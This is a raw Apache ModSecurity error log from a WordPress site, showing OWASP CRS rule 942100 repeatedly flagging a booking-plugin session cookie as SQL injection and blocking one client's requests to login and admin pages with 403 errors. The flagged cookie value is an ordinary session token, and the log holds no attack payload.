[Mon May 11 18:31:29.822363 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEYQ-Qm4vhlWBPlMjl6gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:29.822658 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEYQ-Qm4vhlWBPlMjl6gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:30.464558 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEYQ-Qm4vhlWBPlMjl6gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:30.549696 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEYg-Qm4vhlWBPlMjl6wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:30.550025 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEYg-Qm4vhlWBPlMjl6wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:31.126758 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEYg-Qm4vhlWBPlMjl6wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:31.223557 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEYw-Qm4vhlWBPlMjl7QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:31.223844 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEYw-Qm4vhlWBPlMjl7QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:31.589450 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEYw-Qm4vhlWBPlMjl7QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:31.778808 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEYw-Qm4vhlWBPlMjl7wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:31.779093 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEYw-Qm4vhlWBPlMjl7wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:32.377775 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEYw-Qm4vhlWBPlMjl7wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:32.664251 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEZA-Qm4vhlWBPlMjl8AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:32.664525 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEZA-Qm4vhlWBPlMjl8AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:33.308902 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEZA-Qm4vhlWBPlMjl8AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:33.774099 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEZQ-Qm4vhlWBPlMjl8gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:33.774393 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEZQ-Qm4vhlWBPlMjl8gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:34.432785 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEZQ-Qm4vhlWBPlMjl8gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:34.793120 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEZg-Qm4vhlWBPlMjl9AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:34.793416 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEZg-Qm4vhlWBPlMjl9AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:35.386264 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEZg-Qm4vhlWBPlMjl9AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:35.525047 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEZw-Qm4vhlWBPlMjl9gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:35.525343 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEZw-Qm4vhlWBPlMjl9gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:36.069137 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEZw-Qm4vhlWBPlMjl9gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:36.249043 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEaA-Qm4vhlWBPlMjl9wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:36.249342 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEaA-Qm4vhlWBPlMjl9wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:36.610840 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEaA-Qm4vhlWBPlMjl9wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:36.859415 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEaA-Qm4vhlWBPlMjl-AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:36.859696 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEaA-Qm4vhlWBPlMjl-AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:37.453869 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEaA-Qm4vhlWBPlMjl-AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:37.752479 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEaQ-Qm4vhlWBPlMjl-gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:37.752766 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEaQ-Qm4vhlWBPlMjl-gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:38.358317 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEaQ-Qm4vhlWBPlMjl-gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:38.604811 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEag-Qm4vhlWBPlMjl-wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:38.605087 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEag-Qm4vhlWBPlMjl-wAAAAM"], referer: https://rentparadise.fr/wp-login.php
